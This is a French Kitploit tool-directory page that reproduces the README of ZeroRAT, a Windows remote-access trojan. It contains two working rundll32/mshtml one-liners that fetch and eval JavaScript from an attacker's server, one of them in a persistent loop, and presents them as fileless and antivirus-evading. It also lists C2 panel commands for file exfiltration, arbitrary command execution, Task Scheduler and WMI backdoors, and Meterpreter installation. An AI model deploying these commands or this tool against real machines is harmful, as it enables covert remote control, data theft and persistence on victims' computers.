Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ZeroRAT — ZeroRAT是一款windows上的一句话远控 | Kitploit
Outils/GitHubGitHub/5alt/zerorat
Privilege EscalationPayload GenerationPersistence MechanismsExploitationLateral MovementShellcodeData ExfiltrationPost-ExploitationCommand and ControlRemote Access ToolShellcode GenerationRemote Access Trojan
6332il y a 10 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHub5alt/zerorat

ZeroRAT

ZeroRAT是一款windows上的一句话远控

Voir le dépôt
Partager

#ZeroRAT ##Introduction Un outil de contrôle à distance pour Windows. Le client n'a besoin que d'exécuter une seule commande, en utilisant les programmes natifs de Windows, sans écrire de fichier sur le disque, ce qui lui confère une capacité naturelle d'évitement des antivirus. Il ne persiste pas après redémarrage.

Dans le programme, download et upload sont vus du point de vue du client. Le téléchargement par le client depuis le serveur s'appelle download, et l'envoi par le client vers le serveur s'appelle upload.

##Configuration Dans config.py, modifiez l'adresse de connexion du client et le mot de passe d'administration du panneau de contrôle. N'oubliez pas de vérifier et de désactiver le mode debug.

Le programme dépend de Flask et sqlite3, installez-les avec pip.

##Client Remplacez <ip>:<port> par l'adresse réelle de connexion.

Version normale

root@kitploit:~
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){window.close();}

Version persistante

root@kitploit:~
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);while(1){try{h.Send();B=h.ResponseText;eval(B);}catch(e){}}

##Serveur Panneau d'administration : http://<ip>:<port>/server/

Les commandes supportées par le serveur sont :

  • sessions Lister les clients actifs
  • use <id> Sélectionner un client par son ID
  • set <key> <value> Définir une variable globale
  • show globals/downloads/uploads Afficher les variables globales, les fichiers téléchargeables par le client, les fichiers téléchargés par le client
  • delete session Supprimer le client actuel
  • delete download/upload <id> Supprimer un fichier par son ID
  • upfile Téléverser un fichier vers le serveur et l'ajouter à la liste downloads
  • download Définissez les variables download_file et download_save_path pour que le client télécharge un fichier et le sauvegarde dans download_save_path
  • upload Définissez la variable upload_file pour que le client téléverse le fichier spécifié vers le serveur
  • backdoor tasks <time> Installer une backdoor via le Planificateur de tâches Windows, format horaire 00:00
  • backdoor wmi Installer une backdoor via WMI, exécution toutes les heures

En dehors des commandes ci-dessus, toute autre commande sera exécutée comme une commande système Windows.

Voir /static/js/xkcd_cli.js pour les détails des commandes.

##Développement Maintenance des commandes du panneau d'administration côté client : /static/js/xkcd_cli.js

Maintenance des commandes du panneau d'administration côté serveur : /controllers/server.py

Maintenance du client : /controllers/client.py

Génération du payload client : payload.py

Opérations liées à la base de données : /models/

##Contact http://5alt.me

md5_salt [AT] qq.com

##Références https://gist.github.com/subTee/f1603fa5c15d5f8825c0

http://drops.wooyun.org/tips/11764

http://drops.wooyun.org/tips/8290

http://drops.wooyun.org/tips/12354

https://github.com/chromakode/xkcdfools

http://www.kammerl.de/ascii/AsciiSignature.php

https://github.com/AlessandroZ/LaZagne

##Avertissement L'utilisation de cet outil doit respecter les lois locales. Il est destiné uniquement à des fins de test académique. Il est strictement interdit de prendre le contrôle illégalement d'ordinateurs d'autrui. En cas de dommages, l'auteur décline toute responsabilité.

##License GPLV3

##TODO

  • Améliorer les commandes
  • Chiffrer le trafic de communication
Télécharger l’outil
  • meterpreter shellcode Installer Meterpreter via InstallUtil avec du shellcode, nécessite de définir LHOST et LPORT au préalable (migrate nécessaire pour continuer à recevoir des commandes, dépend de .NET Framework 2.0)
  • meterpreter powershell Installer Meterpreter via PowerShell (dépend de PowerShell 1.0)